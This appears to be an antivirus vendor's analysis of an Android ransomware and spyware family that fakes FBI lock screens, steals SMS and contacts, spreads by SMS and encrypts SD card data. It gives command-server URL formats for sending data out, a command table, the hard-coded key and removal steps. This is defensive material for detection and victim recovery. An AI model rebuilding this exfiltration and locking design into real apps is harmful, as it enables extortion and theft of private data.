Android/Locker.CB!tr

description-logoAnalysis

Android/Locker.CB!tr is a ransomware and spyware which targets Android mobile devices. It scares the victim by saying it has detected suspicious unlawful activity on the phone and claims to have reported the issue to the FBI. The victim is expected to pay $500 as a fine. In most cases, the victim's smartphone is locked on those false allegations and can no longer be used.
The malware also communicates with a remote C&C and, depending on the commands it receives from it, may also perform other actions: encrypt the contents of the SD card, send SMS messages, forward any incoming SMS, forward the list of contacts.
Finally, the malware tries to propagate by sending SMS to contacts of the victim where a link in the SMS redirects to the malware.

Technical Details


The malware comes packaged as com.adobe.videoprayer  and mimics a video player.
  • Figure 1. Malware's icon, faking a video player.

When the application is launched, it displays web pages that scare the victim.
  • Figure 2. The malware's page scare the end-user saying suspicious files were found on his/her device.
For credibility, the web pages:
  • Appear to have come from the Department of Justice / FBI.
  • Include text of US laws.
  • Claim that the information has been uploaded to FBI servers.
  • Display real content from the device: IMEI, phone number, model and IP address, device browser history.
  • Display a picture of the victim. This picture is taken by taking a shot of the person with the smartphone's front camera - presumably the smartphone's owner.
  • Show fake pornographic images. The image is contained in the malware's resources.
  • Illustrate their threats with images of people being handcuffed and arrested by the police.
The display of those screens are handled by the Locker  service, which is started as soon as the malware is launched.
The Locker service is named 'Locker' because it is indeed difficult to move out from those pages for a regular end-user. Consequently, the victim cannot use his/her phone and has the feeling there is no other solution than to pay the ransom.
Experienced end-users should try to kill the service:
  1. Get a shell on the infected device.

  2. Issue :
    am stopservice com.adobe.videoprayer/.LockerService
    
    The locking pages should disappear.

  3. Finally, the malware can be uninstalled:
    pm uninstall com.adobe.videoprayer
    

The locking mechanism also consists of a receiver, named StartLockServiceAtBootReceiver, which ensures the locking service is started as soon as the device boots.
Meanwhile, the Checker  service is also started at startup. This service will:
  • Every minute, contact the remote C&C:
    http://{Removed}.104:12449/pha?android_version=[VersionRelease]&id=[Identifier]&phone_number=[PhoneNumber]&client_version=1.03&imei=[IMEI]&name=[Model]
    
    where [Identifier] corresponds to the Settings.Secure.ANDROID_ID (a hex string which identifies the device), [PhoneNumber] is the infected phone's number, [IMEI] is the infected phone's IMEI, client version corresponds to the malware's version number, [VersionRelease] corresponds to Build.VERSION.RELEASE, and [Model] corresponds to Build.MODEL.
    The C&C responds to this request with a JSON object containing a SMS template:
    {"sms_template": "OMG!!! Guess who's on a video here, you will not believe it!!! Download this application and look on first page http://{Removed}"}
    

    Then, the malware asks for commands:
    http://{Removed}.104:12449/gac/IDENTIFIER
    
    and the C&C responds with a JSON object which contains a command identifier:
    {"id": "3"}
    
    We will detail the commands later on.
    The malware confirms it received the command:
    http://{Removed}4:12449/eaction/IDENTIFIER
    
    to which the C&C responds: "Action execute".
    The malware then performs the command.

  • Every 30 minutes (configurable time set in the code by ContactSmsDelayMillis  in res/values/integers.xml), it tries to propagate by sending SMS messages to some contacts of the victim. The number of contacts to SMS is customized in the code by a variable named ContactCount (see res/values/integers.xml). The malware builds a list of contacts on the smartphone, and will then SMS the first ContactCount entries then, next time, the next ContactCount entries, etc. The SMS which is sent corresponds to a SMS template sent by the C&C server. For example, it can be the SMS template we mentioned earlier. The link in the SMS leads to downloading a sample of this malware (Android/Locker.CB!tr).

  • If an incoming SMS is received and the catchSms option (in the preferences file) is set, the SMS's originating phone number, date and time and body are forwarded in a HTTP request to the C&C as:
    hxxp://{Removed}.104:12449/scs/IDENTIFIER...
    
    Precisely, the receiver IncomingSms is notified of the arrival of a new SMS message (before other receivers because of its high priority). It sends an "incoming_sms" intent to the Checker service, which issues a ReceivedSmsRequest.
The malware is able to process the following commands:
0ACTION_GET_SMS getAndSendSmsData(): Sends all SMS to
hxxp://{Removed}.104:12449/ssms/IDENTIFIER
where the SMS messages (originating number, date and body) are sent as JSON objects
1ACTION_GET_CONTACTS getAndSendContactData(): sends list of all contacts on the phone
hxxp://{Removed}.104:12449/sc/IDENTIFIER
where the list of contacts (name and phone number) are sent as JSON objects
2ACTION_CRYPT_DATA The malware encrypts the SD card's Android directory
3ACTION_LOCK_PHONE The malware makes sure the scare pages are displayed and the phone is locked on those pages
5ACTION_UNLOCK_PHONE The malware stops the Locker service: the scare pages disappear. However, in that case, the malware switches to the Catch Sms mode, where incoming SMS will be forwarded to the C&C
6ACTION_CODE_INCORRECT An alert window is display with the mention 'Entered code is incorrect' to notify the victim that the entered voucher code he/she entered for payment is not valid.
7ACTION_CATCH_SMS setCatchSms: sets the CatchSms entry in the preferences file to true. The consequence is that all incoming SMS message will then be forwarded to the C&C.
8ACTION_SEND_SMS doSendSms: sends a SMS to a given phone number.
The malware sends a request to the C&C:
hxxp://{Removed}.104:12449/gsfs/IDENTIFIER
The malware responds to this with a JSON object containing a phone number and a SMS body. The infected device sends a SMS to that phone number (with the specified body).
9ACTION_STOP_CATCH_SMS This simply sets CatchSms to false, which consequently ends spying incoming SMS messages
10ACTION_DECRYPT_DATA Decrypts the SD card's Android directory
-1ACTION_UNKNOWNNo action to perform

The malware's encryption algorithm is the following.
  • First, the malware derives an AES key from a hard-coded string "ThisIsKey". The derivation algorithm is PBKDF2 with HMAC-SHA1 with 65536 iterations and the hard-coded salt "ThisIsSalt". Basically, this corresponds to 65536 iterations of HMAC-SHA1 on the concatenation of the key string and the salt.

  • The resulting bytes are used as an AES key to encrypt the Android directory of the SD card. The encryption is performed recursively on every file and directory in Android.

  • The decryption follows the same process: the string "ThisIsKey" is derived into a key, and the resulting bytes are used to decrypt the directory. As the key is generated from hard-coded string and salts, it is 'static' and common to all instances of this particular malware. A victim whose SD card got encrypted can implement the decryption process and retrieve his/her data.

If the victim decides to pay, the voucher code the victim enters is sent to the C&C:
http://{Removed}104:12449/cpm/IDENTIFIER?payment_check=CODE&payment_type=29
There is obviously no guarantee the attacker will unlock and/or decrypt the files on the device.
Finally, it is interesting to note that the Checker service is designed to run in background even if the smartphone is locked or idle. It specifically performs a PARTIAL_WAKE_LOCK to run while, if idle/locked, keeping the screen dimmed (less noticeable). End users may however experience a battery drain as the malware will continuously send requests to the C&C.
The malware installs the following files on the device:
  • ./assets/tab2.html
  • ./assets/320x320_stamp and sign.png
  • ./assets/accordion_open.png
  • ./assets/tab1.html
  • ./assets/accordion.js
  • ./assets/320x320_prism-logo.png
  • ./assets/tab4.html
  • ./assets/accordion_closed.png
  • ./assets/accordion.css
  • ./META-INF/CERT.RSA
  • ./META-INF/CERT.SF
  • ./META-INF/MANIFEST.MF
  • ./resources.arsc
  • ./res/drawable-xxxhdpi-v4/ic_clipboard.png
  • ./res/drawable-xxxhdpi-v4/ic_info.png
  • ./res/drawable-xxxhdpi-v4/ic_money.png
  • ./res/drawable-xxxhdpi-v4/ic_justice.png
  • ./res/drawable-xxxhdpi-v4/ic_home.png
  • ./res/layout/tab1.xml
  • ./res/layout/page4.xml
  • ./res/layout/page3.xml
  • ./res/layout/history_item.xml
  • ./res/layout/main_screen.xml
  • ./res/layout/activity_main2.xml
  • ./res/layout/page2.xml
  • ./res/layout/page5.xml
  • ./res/layout/page1.xml
  • ./res/layout/tab4.xml
  • ./res/layout/tab3.xml
  • ./res/layout/page4_header.xml
  • ./res/layout/activity_main.xml
  • ./res/layout/tab2.xml
  • ./res/layout/tab5.xml
  • ./res/drawable-hdpi-v4/p5.png
  • ./res/drawable-hdpi-v4/p2.png
  • ./res/drawable-hdpi-v4/paypal_logo.png
  • ./res/drawable-hdpi-v4/p3.png
  • ./res/drawable-hdpi-v4/p4.png
  • ./res/drawable-hdpi-v4/ic_info.png
  • ./res/drawable-hdpi-v4/logo1.png
  • ./res/drawable-hdpi-v4/bhist.png
  • ./res/drawable-hdpi-v4/ic_launcher.png
  • ./res/drawable-hdpi-v4/paypal_logo_back.png
  • ./res/drawable-hdpi-v4/logo3.png
  • ./res/drawable-hdpi-v4/ic_money.png
  • ./res/drawable-hdpi-v4/ic_justice.png
  • ./res/drawable-hdpi-v4/p1.png
  • ./res/drawable-hdpi-v4/ic_clipboard.png
  • ./res/drawable-hdpi-v4/ic_home.png
  • ./res/drawable-xxhdpi-v4/ic_justice.png
  • ./res/drawable-xxhdpi-v4/ic_money.png
  • ./res/drawable-xxhdpi-v4/ic_info.png
  • ./res/drawable-xxhdpi-v4/ic_launcher.png
  • ./res/drawable-xxhdpi-v4/ic_clipboard.png
  • ./res/drawable-xxhdpi-v4/ic_home.png
  • ./res/xml/device_admin_sample.xml
  • ./res/drawable/s_btn_backspace.xml
  • ./res/drawable/header_bg_tile.xml
  • ./res/drawable/s_btn_pay.xml
  • ./res/drawable/mybackground.xml
  • ./res/drawable/s_btn_number.xml
  • ./res/drawable-xhdpi-v4/image_location.png
  • ./res/drawable-xhdpi-v4/ic_info.png
  • ./res/drawable-xhdpi-v4/input.png
  • ./res/drawable-xhdpi-v4/btn_number.png
  • ./res/drawable-xhdpi-v4/image_flag.png
  • ./res/drawable-xhdpi-v4/ic_launcher.png
  • ./res/drawable-xhdpi-v4/a1.png
  • ./res/drawable-xhdpi-v4/input_field.png
  • ./res/drawable-xhdpi-v4/background.png
  • ./res/drawable-xhdpi-v4/dropdown.png
  • ./res/drawable-xhdpi-v4/ic_justice.png
  • ./res/drawable-xhdpi-v4/btn_pay_pressed.png
  • ./res/drawable-xhdpi-v4/image_jail.png
  • ./res/drawable-xhdpi-v4/btn_number_pressed.png
  • ./res/drawable-xhdpi-v4/btn_send.png
  • ./res/drawable-xhdpi-v4/btn_backspace.png
  • ./res/drawable-xhdpi-v4/btn_backspace_pressed.png
  • ./res/drawable-xhdpi-v4/ic_home.png
  • ./res/drawable-xhdpi-v4/photo_ramka.png
  • ./res/drawable-xhdpi-v4/image_retail.png
  • ./res/drawable-xhdpi-v4/image_lock.png
  • ./res/drawable-xhdpi-v4/ic_clipboard.png
  • ./res/drawable-xhdpi-v4/payment_smallbox.png
  • ./res/drawable-xhdpi-v4/flag_box.png
  • ./res/drawable-xhdpi-v4/payment_bigbox.png
  • ./res/drawable-xhdpi-v4/location_box.png
  • ./res/drawable-xhdpi-v4/btn_pay.png
  • ./res/drawable-xhdpi-v4/image_method_moneypak.png
  • ./res/drawable-xhdpi-v4/back.png
  • ./res/drawable-xhdpi-v4/top_image.png
  • ./res/drawable-xhdpi-v4/ic_money.png
  • ./res/drawable-mdpi-v4/ic_info.png
  • ./res/drawable-mdpi-v4/ic_launcher.png
  • ./res/drawable-mdpi-v4/ic_money.png
  • ./res/drawable-mdpi-v4/ic_home.png
  • ./res/drawable-mdpi-v4/ic_clipboard.png
  • ./res/drawable-mdpi-v4/ic_justice.png
  • ./classes.dex
  • ./AndroidManifest.xml

The malware asks for the following permissions:
  • Allow to send SMS messages.
  • Allow an application to monitor incoming SMS messages, to record or perform processing on them, or or to process WAP Push messages.
  • READ_CONTACTS
  • INTERNET
  • READ_HISTORY_BOOKMARKS

recommended-action-logoRecommended Action

  • Make sure that your FortiGate/FortiClient system is using the latest AV database.
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry logoTelemetry

Detection Availability

FortiGate
Extreme
FortiClient
Extended
FortiMail
Extended
FortiSandbox
Extended
FortiWeb
Extended
Web Application Firewall
Extended
FortiIsolator
Extended
FortiDeceptor
Extended
FortiEDR

Version Updates

Date Version Detail
2022-01-12 89.08643
2022-01-12 89.08642